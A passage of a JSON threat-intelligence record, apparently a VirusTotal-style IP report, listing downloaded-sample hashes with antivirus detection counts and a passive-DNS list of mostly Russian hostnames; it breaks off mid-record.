\"ed8cc893f2e05db0c817847d794249ba9eac3da4597df69860fa70c9b2c043e8\"}, {\"date\": \"2018-05-18 06:07:17\", \"positives\": 0, \"total\": 55, \"sha256\": \"eef69ad36c8a7f1d28980d625d13fec052226f55e9efab2cc9d2ae4fc0d725af\"}, {\"date\": \"2018-05-18 01:25:19\", \"positives\": 0, \"total\": 58, \"sha256\": \"4e59ba79823ae777395bb4ab6c59d82a970ba11cb6d5a5f5de62dc6de88772d9\"}, {\"date\": \"2014-10-14 22:16:42\", \"positives\": 0, \"total\": 54, \"sha256\": \"b73d46fdbed3f265ad38710ab97648a058c64f7a12d8c7827371944bf5198dfe\"}, {\"date\": \"2018-05-16 09:22:30\", \"positives\": 0, \"total\": 61, \"sha256\": \"bd513595de1fb842cdf1797a9719684c685238b384edb722420997b385a99178\"}, {\"date\": \"2018-05-15 13:56:17\", \"positives\": 0, \"total\": 59, \"sha256\": \"93d6be751069acfa290e7828566aad806234369b22b6b263140a7285be9a7b4d\"}, {\"date\": \"2018-01-31 09:56:06\", \"positives\": 0, \"total\": 70, \"sha256\": \"eb4402744c8df623ae4a80de9a7098ffc53ceb9f87ac057f3fc782c7f470dbb7\"}, {\"date\": \"2018-05-13 19:07:13\", \"positives\": 0, \"total\": 60, \"sha256\": \"8ee66c1e20b9acfaf9ec283bc59ed44b3ff0905e0375b5dbe7f9d880f1c41b15\"}, {\"date\": \"2018-05-09 14:17:07\", \"positives\": 0, \"total\": 59, \"sha256\": \"7ca07766d9e4adf3f4d4233218882278ef29c7f99041ab05cede32ff6565d1f9\"}, {\"date\": \"2018-05-02 15:21:11\", \"positives\": 0, \"total\": 59, \"sha256\": \"37c496967e044f9518a92aaf9f1e0f37170b486d6b23b458937f55f5c7181c1c\"}, {\"date\": \"2018-04-28 14:24:51\", \"positives\": 0, \"total\": 71, \"sha256\": \"5108f83c5d8be8522513dce0c46cba1aaeadc3498b952e25da5b5fb3ee420843\"}, {\"date\": \"2018-04-29 15:51:35\", \"positives\": 0, \"total\": 56, \"sha256\": \"ffbb82dbb5b426ee52f11c2865204e14a43b1f7a550d2721ef9b4d2706a6185a\"}, {\"date\": \"2018-04-28 21:57:49\", \"positives\": 0, \"total\": 54, \"sha256\": \"b481ab1e8218d2b4586404554cde3dc1d50fe265d286e8ff71cf4568f9a40a42\"}, {\"date\": \"2018-04-28 19:41:27\", \"positives\": 0, \"total\": 60, \"sha256\": \"b31bc2a531d3371163ba878d44f28b5bc87f360f956dab58f8b01ca051f7270f\"}, {\"date\": \"2018-04-25 15:01:31\", \"positives\": 0, \"total\": 59, \"sha256\": \"b3b5852b58125e1d06e9cec166c24f60076ae48caa0fb7539c316c7b366f5a06\"}], \"whois_timestamp\": 1552320202, \"detected_downloaded_samples\": [{\"date\": \"2018-12-29 16:46:16\", \"positives\": 25, \"total\": 72, \"sha256\": \"11aff8518be81da69b540ffb92b7f903c6c6f72b65f485be8bbcf3cfb0220d1c\"}, {\"date\": \"2018-06-23 23:52:33\", \"positives\": 2, \"total\": 71, \"sha256\": \"49223f9e52adb58e3c603c0a79365fa6efbaeadf060405634a0b27eda8b8fbf8\"}, {\"date\": \"2019-02-16 05:39:53\", \"positives\": 12, \"total\": 57, \"sha256\": \"cf64a6fd51b00b3f6454f39d8f1981889140ed47c06320ebf64b522e3e3e17ee\"}, {\"date\": \"2018-09-30 16:35:18\", \"positives\": 1, \"total\": 71, \"sha256\": \"d7fefd9e69ccab4d6cea86d889809543e11288450dadc03e538226f32816f624\"}, {\"date\": \"2019-02-12 02:59:26\", \"positives\": 27, \"total\": 57, \"sha256\": \"03e36ea72d03879f78276a7122c506ede3faa55a0f1c7730b1b865f46360f68f\"}, {\"date\": \"2019-02-01 17:50:44\", \"positives\": 39, \"total\": 57, \"sha256\": \"edb2f2bdd4ea5932600b56f2ec34f0f6a307bfd7b826f7f9c0ce30fce64d6fa2\"}, {\"date\": \"2019-02-01 14:32:47\", \"positives\": 19, \"total\": 56, \"sha256\": \"44a9c0bc349896b1998091d41e1d294f421d1002368364821b4497ab12896dc2\"}, {\"date\": \"2019-01-31 03:10:35\", \"positives\": 27, \"total\": 59, \"sha256\": \"a2eb6e647ac9553d942c616f657d5757a3b3d27d9337ddd49608720a29db09fc\"}, {\"date\": \"2019-01-29 09:57:12\", \"positives\": 27, \"total\": 59, \"sha256\": \"e4858ba879c2e1a790239df9a6cb2407cb78ad3d6499efac5a3eddc2fa512dad\"}, {\"date\": \"2019-01-29 09:38:10\", \"positives\": 26, \"total\": 57, \"sha256\": \"d8b72edb1fa938c6b8333f62d976e3a462583e75875b8d9b2fc3e264db2e8f59\"}, {\"date\": \"2019-01-28 06:18:19\", \"positives\": 11, \"total\": 69, \"sha256\": \"30d514c5175f3cb26a726291bc014880d02248e118975f643c4e50195b5f47dd\"}, {\"date\": \"2019-01-26 07:29:27\", \"positives\": 36, \"total\": 70, \"sha256\": \"89cdc8e683b5d7faf928d729679240ca998c1f0f42d1a6fc4da62f350977da1a\"}, {\"date\": \"2019-01-25 16:27:43\", \"positives\": 14, \"total\": 70, \"sha256\": \"8e849eeb7494295a99439cfddbe2c7c017dbce741f3d509047b58bf14bbb2342\"}, {\"date\": \"2019-01-24 06:18:24\", \"positives\": 34, \"total\": 58, \"sha256\": \"fcc7922f9bb66e6a5af2149154ebd1a5d100c203a4e2fc32e2debfb2e9942d1e\"}, {\"date\": \"2019-01-23 21:47:40\", \"positives\": 21, \"total\": 71, \"sha256\": \"711149f1fde77b7bce8dd3b1b062bf6f5ed66d5260c617b496d72aba01b5ada6\"}, {\"date\": \"2019-01-18 15:04:06\", \"positives\": 10, \"total\": 70, \"sha256\": \"fa33587fdd96d4558140c90a37e9a28b11b79f208c7f80791da03a70ed162312\"}, {\"date\": \"2019-01-15 05:55:15\", \"positives\": 51, \"total\": 67, \"sha256\": \"306af8526c15d5ebe53cacd36f1bab97aa9f4e36fbd9f916bd1dce9092dd983d\"}, {\"date\": \"2019-01-07 10:12:26\", \"positives\": 34, \"total\": 57, \"sha256\": \"d9490fc5872cd35bba393fd5c97879063b750e938082a56f7cadaf0f856eff1e\"}, {\"date\": \"2019-01-06 20:31:57\", \"positives\": 45, \"total\": 57, \"sha256\": \"7c7241d1e97e1d893dda50c8b629c43dc62753e61dcd78e0fbf2fff140ba8add\"}, {\"date\": \"2019-01-06 10:19:14\", \"positives\": 13, \"total\": 56, \"sha256\": \"1c790b8e05c5b3df55e9498364bd7ae5f5a245507c72146fcbb4ca86b1268afe\"}, {\"date\": \"2019-01-05 06:15:10\", \"positives\": 47, \"total\": 61, \"sha256\": \"ec0d42f9fe2e30b4e70034d14cc78008e19395a99c351181da108d7790f74090\"}, {\"date\": \"2018-10-02 14:48:13\", \"positives\": 1, \"total\": 71, \"sha256\": \"91e4842e53226b13f477e8a2fb32b4c3d9b76f5da5c7a6e1d2c7f955d1eb30a5\"}, {\"date\": \"2018-12-29 14:25:04\", \"positives\": 11, \"total\": 57, \"sha256\": \"2ec1b5f6585ed8b11b168c09016b545a1489253fe15153021245332e664b2293\"}, {\"date\": \"2018-12-25 02:51:31\", \"positives\": 29, \"total\": 59, \"sha256\": \"46bcf373deb9052eac254b6c25e892385678f4c83afbf12aa5483aa2e570c304\"}, {\"date\": \"2018-12-18 10:00:59\", \"positives\": 26, \"total\": 57, \"sha256\": \"0f5ca7042636bb6961f85895e875938b505356da815fce522b0a69620546ba76\"}, {\"date\": \"2018-12-15 10:16:44\", \"positives\": 28, \"total\": 60, \"sha256\": \"470ed7d345b3efc66e656cbebdad5c5976143eb43cdbcf7a62f74f2fbc97c827\"}, {\"date\": \"2018-12-08 02:21:34\", \"positives\": 27, \"total\": 60, \"sha256\": \"cbccd9347040ab5b18d148ec7b346895eb448283467100eba776b061da48feac\"}, {\"date\": \"2018-12-04 07:00:01\", \"positives\": 4, \"total\": 60, \"sha256\": \"b13c134b2a42e6254f3666983e9ab895ae437ca4ccb5bf703029373a1cabc0d8\"}, {\"date\": \"2018-12-02 10:06:57\", \"positives\": 25, \"total\": 58, \"sha256\": \"7a0cc2ddaa00e9b98d63656ba04c6ba94989db7e69b42aaf466f6cf078ff93b4\"}, {\"date\": \"2018-12-01 13:48:52\", \"positives\": 1, \"total\": 67, \"sha256\": \"2368aab964018b4221282180133e186ba84167aa5dfdbb7d2759a2fbfdb41e86\"}, {\"date\": \"2018-12-01 04:35:20\", \"positives\": 25, \"total\": 71, \"sha256\": \"5f31176b863745d770fb10acbb9053599e870a521c14d99cf6ff95bd5badc469\"}, {\"date\": \"2018-11-28 01:47:32\", \"positives\": 29, \"total\": 59, \"sha256\": \"84164d00687bdf41bdf7e089567239d9ba4591ca7f418e95b49db704b02bb909\"}, {\"date\": \"2018-11-26 10:09:58\", \"positives\": 19, \"total\": 56, \"sha256\": \"f91388468a6b410129d7044793c1ac384c1d41e436e75cbafdbf14aef767f1db\"}, {\"date\": \"2018-11-26 10:07:30\", \"positives\": 20, \"total\": 57, \"sha256\": \"2bd41098514aa9087662044675dc73f3feb1eba3652b31080468e3e958867e35\"}, {\"date\": \"2018-11-13 04:47:56\", \"positives\": 16, \"total\": 58, \"sha256\": \"2c04200ef11b2c077289b9361acfcd0cf9a9e3c4838a6c1f54daa80cde71d1e5\"}, {\"date\": \"2017-08-31 16:01:59\", \"positives\": 2, \"total\": 67, \"sha256\": \"8ca7defc2e8fdb785380b86999eb115c7d74149c29a02c98d1fdb6f708d4318e\"}, {\"date\": \"2018-10-27 02:15:59\", \"positives\": 38, \"total\": 57, \"sha256\": \"1ba5509373ed47e261ae5cd6e79147e710f0cd177ab1afaf95ed172caefb3035\"}, {\"date\": \"2018-10-24 11:47:32\", \"positives\": 33, \"total\": 56, \"sha256\": \"daeb4bbb4ae2bd7c06df777df9f46263fa4c09402b3cf93ce39e8e27b2f6dc19\"}, {\"date\": \"2018-10-22 10:23:11\", \"positives\": 27, \"total\": 57, \"sha256\": \"d2c49374c979d172eb3a97b902116011765912144b9ae8d90754baee4aba5e64\"}, {\"date\": \"2018-10-14 16:48:08\", \"positives\": 33, \"total\": 59, \"sha256\": \"eed5281764dfdb6cc8cc0bfb731c5700a59baa288d3f8864a256446975c6e0c4\"}, {\"date\": \"2018-10-12 03:00:45\", \"positives\": 23, \"total\": 58, \"sha256\": \"06d391a20fe4d1a3920b3ea07aa44681d94af96fbfc717150ad4562a3070b38a\"}, {\"date\": \"2018-10-11 23:37:16\", \"positives\": 27, \"total\": 59, \"sha256\": \"efe75769d656821c62c836fe1c9a4c839a975258ce6ce3176865a75fd4267b87\"}, {\"date\": \"2018-10-11 23:00:08\", \"positives\": 23, \"total\": 59, \"sha256\": \"92dcad1e2753aaf315c753c549ba1824934fa172c7f489d22fcfbe9340e179c5\"}, {\"date\": \"2018-10-11 22:42:52\", \"positives\": 17, \"total\": 53, \"sha256\": \"cd550c8142bee7604bd0bd47eb71e56748cbce378c3d558bfa5c28db1816f628\"}, {\"date\": \"2018-10-07 06:25:27\", \"positives\": 15, \"total\": 62, \"sha256\": \"559b62571d080a665404af083b53ae9d5278b4941224a60a66e27cd81958f8e6\"}, {\"date\": \"2018-10-07 06:07:29\", \"positives\": 17, \"total\": 46, \"sha256\": \"81f007187e8461a9caf8cb4acd19fab2a38e6170cf7ea62673baac2718695f52\"}, {\"date\": \"2018-10-07 02:44:49\", \"positives\": 33, \"total\": 58, \"sha256\": \"d90f70465c03ff08dfaa7060ff5f739535ca39f6b9b1b98a44d8324b8c4a1b12\"}, {\"date\": \"2018-10-06 16:16:35\", \"positives\": 20, \"total\": 56, \"sha256\": \"bacaf9c4341cca7b39e6574923aae728b8ee34993dde29af51e42ff50a3bd919\"}, {\"date\": \"2018-10-05 01:39:41\", \"positives\": 3, \"total\": 57, \"sha256\": \"61d79b79c1edd5b553973c61a67fe84bc53843dffa3e3803c1989ff88cbf46f1\"}, {\"date\": \"2018-10-03 05:55:42\", \"positives\": 16, \"total\": 46, \"sha256\": \"05f10b95e00777a000c6dff9e6645ef8b2634e463f113238f56223d97cbd0a7a\"}, {\"date\": \"2018-09-28 17:53:33\", \"positives\": 33, \"total\": 59, \"sha256\": \"0aff5976b1255e23cf8571779f1a3fac9f833145c5f388bb16addb36e5fe1ec5\"}, {\"date\": \"2018-09-22 17:17:29\", \"positives\": 52, \"total\": 68, \"sha256\": \"c86fd81aede1a694f978ee09be2f16c6bcd335741538e666883d69dbb9c4c1ae\"}, {\"date\": \"2018-09-22 16:52:36\", \"positives\": 1, \"total\": 57, \"sha256\": \"aa5d3df2fc1ce14e9cf0aa98da45d18461878ce5a77c90e48b78695d0c9033d9\"}, {\"date\": \"2018-09-21 04:19:32\", \"positives\": 19, \"total\": 53, \"sha256\": \"f240bcd7959bd77ccbe610d3685177a676d31f8339d83dbc318cf4e557449bfd\"}, {\"date\": \"2018-09-15 05:15:22\", \"positives\": 22, \"total\": 56, \"sha256\": \"acd5a1453df6092e5eda64dd774eb659c5d0f754c4906a203436dc392bdef117\"}, {\"date\": \"2018-09-12 22:53:58\", \"positives\": 1, \"total\": 57, \"sha256\": \"f3d50c39a2767aaff1691c50abf575e27b58a75c61dbcfc4915eeb8794a896d1\"}, {\"date\": \"2018-09-09 01:04:00\", \"positives\": 10, \"total\": 42, \"sha256\": \"583cc509526a755b7658a073cba7fa6b557a2d64b1ec74fa72023a543e7eba64\"}, {\"date\": \"2018-09-07 02:04:32\", \"positives\": 11, \"total\": 57, \"sha256\": \"91b827f37a575c10f70c843da5a98a0e240dec982d87c86fa8fbddf29d451641\"}, {\"date\": \"2018-09-07 02:04:01\", \"positives\": 12, \"total\": 59, \"sha256\": \"6257f25f6ac3894381fa99d680c912bfb4bdf3c689f5c6df031289f5fbeff04c\"}, {\"date\": \"2018-09-07 02:02:04\", \"positives\": 12, \"total\": 59, \"sha256\": \"8a89d45c7c989f01004ef571076ce533159964710df266c9e05681e5c5fee382\"}, {\"date\": \"2018-09-07 02:01:36\", \"positives\": 13, \"total\": 56, \"sha256\": \"a82884bfdb05fd44b50a0dd5eafc6ec34f110582c2b65f554d4ff266e9533814\"}, {\"date\": \"2018-09-03 02:58:30\", \"positives\": 19, \"total\": 54, \"sha256\": \"b3768ce22653b06cff05dfdc9330376d9252527864ed9d12ea3ea6a4073dce0d\"}, {\"date\": \"2018-08-20 14:47:49\", \"positives\": 14, \"total\": 57, \"sha256\": \"c22d53cd768682ac67e85f1674e1f3e8dcbee6ae49b17a20664adc8a7712da9a\"}, {\"date\": \"2018-08-20 09:57:48\", \"positives\": 9, \"total\": 28, \"sha256\": \"802acd030e58fbce7789bc9cd903fd89965fa65abb4776d6c18f7d0942733c5a\"}, {\"date\": \"2018-08-18 14:41:10\", \"positives\": 22, \"total\": 56, \"sha256\": \"da97eaca1281b6f0bb905480fd27c32467c36b1128b9a28d992cef51217332a4\"}, {\"date\": \"2018-08-13 05:25:59\", \"positives\": 40, \"total\": 59, \"sha256\": \"d23e40540663c129aa9c1babf1ac13a7ec48f7996f7fdb2ece08497fe30a001d\"}, {\"date\": \"2018-08-06 16:03:00\", \"positives\": 35, \"total\": 60, \"sha256\": \"381cbe6b0fe5543bfc045a89fc684c1de2a4d16d8c1af0ce7d7039a5b057fae7\"}, {\"date\": \"2018-08-06 15:51:25\", \"positives\": 24, \"total\": 57, \"sha256\": \"0ed8b90ff48a29dd6df6e43c9a36a6719ba931eb4939a7ca5cbc5d4eb755e632\"}, {\"date\": \"2018-08-06 15:20:05\", \"positives\": 20, \"total\": 54, \"sha256\": \"b3467ce275b7e038603bda7bc236506f365a7929648286e4f11dea54001b5cd5\"}, {\"date\": \"2018-07-18 03:54:34\", \"positives\": 11, \"total\": 57, \"sha256\": \"f5fb95b32b0549399d113b673aafbc9796f92b60e40b8955c267f093959c705a\"}, {\"date\": \"2018-07-18 03:54:29\", \"positives\": 13, \"total\": 56, \"sha256\": \"51eb832f0d2c022fff4f33db135b4a17cf76cd3920bec2b15c9dcd731623b259\"}, {\"date\": \"2018-07-18 03:54:23\", \"positives\": 12, \"total\": 57, \"sha256\": \"a2354a663e1e64682ad82112a9989296a098965dc14da5096ae9f0bf8ec42d13\"}, {\"date\": \"2018-07-18 03:54:07\", \"positives\": 12, \"total\": 57, \"sha256\": \"4cbe879f47bba942daf4e9866945ca32bda3a6be646801531e82d03a3184455d\"}, {\"date\": \"2018-07-18 03:28:17\", \"positives\": 12, \"total\": 59, \"sha256\": \"c4a70c248fd8486dd4bd9c34091fd11908146c19bdd0b1b6c9a38356eeb94c30\"}, {\"date\": \"2018-07-14 12:50:19\", \"positives\": 12, \"total\": 60, \"sha256\": \"d36280d0534a1034af0ce1e01e195f06f3fe2e65fbefaa9b776580ace6d81988\"}, {\"date\": \"2018-07-12 09:38:42\", \"positives\": 15, \"total\": 59, \"sha256\": \"80272a7b41031178b76fdde2b49ee1a3b1aa6553b259f2f752b94c44b692d484\"}, {\"date\": \"2018-06-29 19:53:39\", \"positives\": 4, \"total\": 59, \"sha256\": \"ea5461cdc3ba50bc9cae9eaf777b4b877244ac8542fcedf935e8441973b75295\"}, {\"date\": \"2018-06-24 22:36:35\", \"positives\": 24, \"total\": 60, \"sha256\": \"167346d7c1f9820fb231d853779afdae9c07660edabaf5a6e7c84d2ea2f5258e\"}, {\"date\": \"2018-06-24 09:10:55\", \"positives\": 11, \"total\": 55, \"sha256\": \"1a25e778d821ecd30e19defa896bf96b97be8701fe83d6736176a22fbc039b6b\"}, {\"date\": \"2017-10-20 01:51:29\", \"positives\": 5, \"total\": 70, \"sha256\": \"d1189d15f3f208a2ad97bc938fc830dd55d2f1336a66fb1ea80dfef449c11de5\"}, {\"date\": \"2018-06-03 22:49:54\", \"positives\": 15, \"total\": 44, \"sha256\": \"60c1138ffc0e5544415b6f46a211319104e852adbadd2004755c5407009ada86\"}, {\"date\": \"2018-05-30 13:43:12\", \"positives\": 24, \"total\": 61, \"sha256\": \"4e2278930726e30826a328f0e75cfad2fe85d317a3263ccb57baefe34c7fdd9c\"}, {\"date\": \"2018-05-21 20:05:54\", \"positives\": 40, \"total\": 57, \"sha256\": \"8d260ca18406dd95ff8033a6c4d7c6e9fb502c24426c237ed6d421bb4a030211\"}, {\"date\": \"2018-05-16 21:35:03\", \"positives\": 39, \"total\": 60, \"sha256\": \"4a1b60a1e13327651dd5104f9697667eb21796f6b612226d43961f4df8118421\"}, {\"date\": \"2018-05-07 06:57:41\", \"positives\": 1, \"total\": 60, \"sha256\": \"a040ee0f7aaed324d43619262c2e757a3afccad082d5ec79811fd5400aa5215e\"}, {\"date\": \"2018-05-03 19:42:59\", \"positives\": 39, \"total\": 60, \"sha256\": \"dae30c760b871dfb878da48fea16b0d18d4c353be55a8ecfd1b94617d857e7f6\"}, {\"date\": \"2018-04-09 12:48:35\", \"positives\": 41, \"total\": 71, \"sha256\": \"d67c7ef1c8e2cd56e266902bef814ac328d64bbe06086f4ee24fbadbebf39605\"}, {\"date\": \"2018-03-31 13:03:40\", \"positives\": 2, \"total\": 59, \"sha256\": \"5fd7bd4ef404c922654638792308bf85abb51eaf2217130a6b809f920bc44dd5\"}, {\"date\": \"2018-03-30 19:26:57\", \"positives\": 16, \"total\": 46, \"sha256\": \"5d78d7bc216407bd4d7071d9d3401b4a2bf538b0ed311837a16a093e33a8367a\"}, {\"date\": \"2018-03-28 09:58:21\", \"positives\": 19, \"total\": 56, \"sha256\": \"c97d131ac3b81bf6fbb45779165befecc20436af30a12d2b8a9c1c0113b90a60\"}, {\"date\": \"2018-03-27 18:17:23\", \"positives\": 20, \"total\": 57, \"sha256\": \"c707b5531673f9fc16f1fd56a0a0230870d3f4899fa8e950fa7c11e73025f3c0\"}, {\"date\": \"2018-03-27 07:07:19\", \"positives\": 21, \"total\": 57, \"sha256\": \"571af9b6592df47ab72a880bf9477f792e9eea143eab9dd45507ae67205ddbe5\"}, {\"date\": \"2018-03-26 22:23:31\", \"positives\": 8, \"total\": 43, \"sha256\": \"d8cfd89547e0b919aadc2bf8a4ddffc276605e1b30703410c3b8bf00209923ae\"}, {\"date\": \"2018-03-10 14:27:33\", \"positives\": 20, \"total\": 56, \"sha256\": \"7c14a65f0eebc706ebc406f661e04b5db558dc4041b16b3456bf2e162de6979d\"}, {\"date\": \"2018-02-11 19:44:57\", \"positives\": 48, \"total\": 67, \"sha256\": \"11a162caa419ef4f83ee5c613d1a96907d4df3d52c455c81b50e030e31822678\"}, {\"date\": \"2018-01-23 09:06:35\", \"positives\": 1, \"total\": 68, \"sha256\": \"72ec27bd0d959a1e6713d96b4e55c5a9b92ac6d1b5b5a4a8d5d1211422fcee57\"}, {\"date\": \"2017-12-07 22:05:38\", \"positives\": 7, \"total\": 59, \"sha256\": \"fb8fb74fafae7428a5dc9fa9a47d79dc450b4e9b40d5b8087758ac38a0f36528\"}, {\"date\": \"2017-12-05 16:12:01\", \"positives\": 22, \"total\": 59, \"sha256\": \"46217dc4ef9fcef981be9a931995008f56b71e3f510721c33ed4b58b577e8fbb\"}, {\"date\": \"2017-11-29 22:53:19\", \"positives\": 6, \"total\": 70, \"sha256\": \"178253f73f842e5f39a66ec99b97a98fdf366a292834c6eb65b0c5b8b41f1599\"}, {\"date\": \"2017-11-29 20:30:30\", \"positives\": 7, \"total\": 60, \"sha256\": \"7bdf7722115be910e2b301b3f6b3037bc4b987c588838cd2459aeeeec9f50be7\"}], \"resolutions\": [{\"last_resolved\": \"2019-02-19 20:45:37\", \"hostname\": \"0-1000v.ru\"}, {\"last_resolved\": \"2014-12-22 00:00:00\", \"hostname\": \"00004.ru\"}, {\"last_resolved\": \"2015-09-18 00:00:00\", \"hostname\": \"01sasha.ru\"}, {\"last_resolved\": \"2013-06-20 00:00:00\", \"hostname\": \"027.ru\"}, {\"last_resolved\": \"2016-03-11 00:00:00\", \"hostname\": \"03magnet.com\"}, {\"last_resolved\": \"2015-04-21 00:00:00\", \"hostname\": \"03magnet.ru\"}, {\"last_resolved\": \"2014-12-06 00:00:00\", \"hostname\": \"04gaz.ru\"}, {\"last_resolved\": \"2019-01-02 12:46:51\", \"hostname\": \"0525.ru\"}, {\"last_resolved\": \"2019-01-02 16:36:36\", \"hostname\": \"0987654321.ru\"}, {\"last_resolved\": \"2015-09-16 00:00:00\", \"hostname\": \"0notole.ru\"}, {\"last_resolved\": \"2013-06-09 00:00:00\", \"hostname\": \"1-52.ru\"}, {\"last_resolved\": \"2019-01-28 01:18:44\", \"hostname\": \"1-aqua.ru\"}, {\"last_resolved\": \"2019-01-02 16:39:03\", \"hostname\": \"1-b.ru\"}, {\"last_resolved\": \"2016-03-16 00:00:00\", \"hostname\": \"1-pb.ru\"}, {\"last_resolved\": \"2014-10-21 00:00:00\", \"hostname\": \"1-pp.ru\"}, {\"last_resolved\": \"2018-08-20 23:39:19\", \"hostname\": \"1.kidsportmed.ru\"}, {\"last_resolved\": \"2018-04-28 14:21:29\", \"hostname\": \"10-days.ru\"}, {\"last_resolved\": \"2018-09-19 22:24:28\", \"hostname\": \"1001kmv.ru\"}, {\"last_resolved\": \"2019-02-24 15:29:43\", \"hostname\": \"10040.ru\"}, {\"last_resolved\": \"2019-03-04 15:31:32\", \"hostname\": \"100bombardirov.ru\"}, {\"last_resolved\": \"2018-11-05 13:04:26\", \"hostname\": \"100pu.ru\"}, {\"last_resolved\": \"2014-10-03 00:00:00\", \"hostname\": \"101interiors.ru\"}, {\"last_resolved\": \"2018-07-13 22:14:42\", \"hostname\": \"101roze.ru\"}, {\"last_resolved\": \"2019-01-02 08:58:57\", \"hostname\": \"101veo.ru\"}, {\"last_resolved\": \"2017-12-25 00:00:00\", \"hostname\": \"102news.ru\"}, {\"last_resolved\": \"2018-12-25 11:14:14\", \"hostname\": \"11.edu.ru\"}, {\"last_resolved\": \"2018-08-02 19:47:08\", \"hostname\": \"1208427.ru\"}, {\"last_resolved\": \"2018-09-10 02:31:42\", \"hostname\": \"1230222.ru\"}, {\"last_resolved\": \"2019-02-19 18:32:08\", \"hostname\": \"4242467890.ru\"}, {\"last_resolved\": \"2018-07-13 22:12:26\", \"hostname\": \"123kd.ru\"}, {\"last_resolved\": \"2015-01-26 00:00:00\", \"hostname\": \"127degrees.ru\"}, {\"last_resolved\": \"2019-03-07 22:04:15\", \"hostname\": \"12rodnikov.ru\"}, {\"last_resolved\": \"2018-09-09 12:54:53\", \"hostname\": \"1337.ru\"}, {\"last_resolved\": \"2016-07-09 00:00:00\", \"hostname\": \"13photo.ru\"}, {\"last_resolved\": \"2015-02-21 00:00:00\", \"hostname\": \"15-86.ru\"}, {\"last_resolved\": \"2016-07-17 00:00:00\", \"hostname\": \"1503414.ru\"}, {\"last_resolved\": \"2019-01-28 01:10:52\", \"hostname\": \"1520gym.ru\"}, {\"last_resolved\": \"2019-03-07 11:16:18\", \"hostname\": \"1580.ru\"}, {\"last_resolved\": \"2019-01-20 11:25:08\", \"hostname\": \"1586.su\"}, {\"last_resolved\": \"2017-06-23 00:00:00\", \"hostname\": \"15dney.ru\"}, {\"last_resolved\": \"2019-01-05 04:51:14\", \"hostname\": \"15x21.ru\"}, {\"last_resolved\": \"2018-08-29 09:09:27\", \"hostname\": \"16-600.ru\"}, {\"last_resolved\": \"2015-03-02 00:00:00\", \"hostname\": \"174.ru\"}, {\"last_resolved\": \"2018-09-06 22:42:02\", \"hostname\": \"190587.ru\"}, {\"last_resolved\": \"2018-08-13 22:15:36\", \"hostname\": \"199printerov.ru\"}, {\"last_resolved\": \"2019-01-07 20:48:31\", \"hostname\": \"1atlant.ru\"}, {\"last_resolved\": \"2017-05-19 00:00:00\", \"hostname\": \"1bgtvch.ru\"}, {\"last_resolved\": \"2014-11-26 00:00:00\", \"hostname\": \"1bk1.ru\"}, {\"last_resolved\": \"2018-10-03 09:46:03\", \"hostname\": \"1buy.su\"}, {\"last_resolved\": \"2019-01-05 08:58:27\", \"hostname\": \"1c-best.ru\"}, {\"last_resolved\": \"2018-07-02 03:18:43\", \"hostname\": \"1c-flora.ru\"}, {\"last_resolved\": \"2018-08-25 13:31:00\", \"hostname\": \"1c-spau.ru\"}, {\"last_resolved\": \"2014-11-27 00:00:00\", \"hostname\": \"1cbase.com\"}, {\"last_resolved\": \"2015-07-10 00:00:00\", \"hostname\": \"1hit-top.ru\"}, {\"last_resolved\": \"2016-03-16 00:00:00\", \"hostname\": \"1lo-rop.ru\"}, {\"last_resolved\": \"2016-03-24 00:00:00\", \"hostname\": \"1lov-top.ru\"}, {\"last_resolved\": \"2018-07-24 17:13:19\", \"hostname\": \"1nakleika.ru\"}, {\"last_resolved\": \"2019-01-05 08:40:56\", \"hostname\": \"1nfotec.com\"}, {\"last_resolved\": \"2019-01-27 08:42:17\", \"hostname\": \"1okna74.ru\"}, {\"last_resolved\": \"2018-09-06 18:50:16\", \"hostname\": \"1tahograf.net\"}, {\"last_resolved\": \"2014-10-14 00:00:00\", \"hostname\": \"1tanec.ru\"}, {\"last_resolved\": \"2015-07-10 00:00:00\", \"hostname\": \"1top-vk.ru\"}, {\"last_resolved\": \"2015-06-01 00:00:00\", \"hostname\": \"1tsovo.net\"}, {\"last_resolved\": \"2016-04-10 00:00:00\", \"hostname\": \"1tyur.ru\"}, {\"last_resolved\": \"2019-01-23 22:19:50\", \"hostname\": \"1vrk.ru\"}, {\"last_resolved\": \"2015-07-23 00:00:00\", \"hostname\": \"1wow-rot.ru\"}, {\"last_resolved\": \"2016-09-09 00:00:00\", \"hostname\": \"1zxcv.ru\"}, {\"last_resolved\": \"2019-01-05 12:53:31\", \"hostname\": \"20000.ru\"}, {\"last_resolved\": \"2019-01-05 12:41:37\", \"hostname\": \"2000diet.ru\"}, {\"last_resolved\": \"2018-09-21 07:22:18\", \"hostname\": \"2016.artekforum.ru\"}, {\"last_resolved\": \"2018-05-06 14:22:31\", \"hostname\": \"2017.gastreet.com\"}, {\"last_resolved\": \"2018-07-24 22:34:26\", \"hostname\": \"2018.tpkarmada.ru\"}, {\"last_resolved\": \"2015-09-18 00:00:00\", \"hostname\": \"2107039.ru\"}, {\"last_resolved\": \"2016-02-26 00:00:00\", \"hostname\": \"2152387.ru\"}, {\"last_resolved\": \"2019-02-04 22:28:26\", \"hostname\": \"223-fz.ru\"}, {\"last_resolved\": \"2019-03-07 14:33:12\", \"hostname\": \"2233444.ru\"}, {\"last_resolved\": \"2018-08-29 02:29:05\", \"hostname\": \"223fz.inkontech.ru\"}, {\"last_resolved\": \"2018-12-29 04:45:41\", \"hostname\": \"2253969.ru\"}, {\"last_resolved\": \"2014-12-01 00:00:00\", \"hostname\": \"2466.ru\"}, {\"last_resolved\": \"2019-02-04 04:59:28\", \"hostname\": \"24catallina.ru\"}, {\"last_resolved\": \"2019-01-05 16:51:41\", \"hostname\": \"24katek.ru\"}, {\"last_resolved\": \"2019-03-06 19:56:53\", \"hostname\": \"24you.ru\"}, {\"last_resolved\": \"2015-03-01 00:00:00\", \"hostname\": \"250199.ru\"}, {\"last_resolved\": \"2017-09-26 00:00:00\", \"hostname\": \"270000.ru\"}, {\"last_resolved\": \"2019-01-07 20:50:54\", \"hostname\": \"290017.ru\"}, {\"last_resolved\": \"2013-08-27 00:00:00\", \"hostname\": \"2912249.ru\"}, {\"last_resolved\": \"2014-11-16 00:00:00\", \"hostname\": \"2askeri.com\"}, {\"last_resolved\": \"2016-09-22 00:00:00\", \"hostname\": \"2assr.ru\"}, {\"last_resolved\": \"2015-07-10 00:00:00\", \"hostname\": \"2hit-top.ru\"}, {\"last_resolved\": \"2017-12-13 00:00:00\", \"hostname\": \"2hype.ru\"}, {\"last_resolved\": \"2018-09-09 23:44:40\", \"hostname\": \"2kolesa.org\"}, {\"last_resolved\": \"2015-07-23 00:00:00\", \"hostname\": \"2ros-wow.ru\"}, {\"last_resolved\": \"2016-04-13 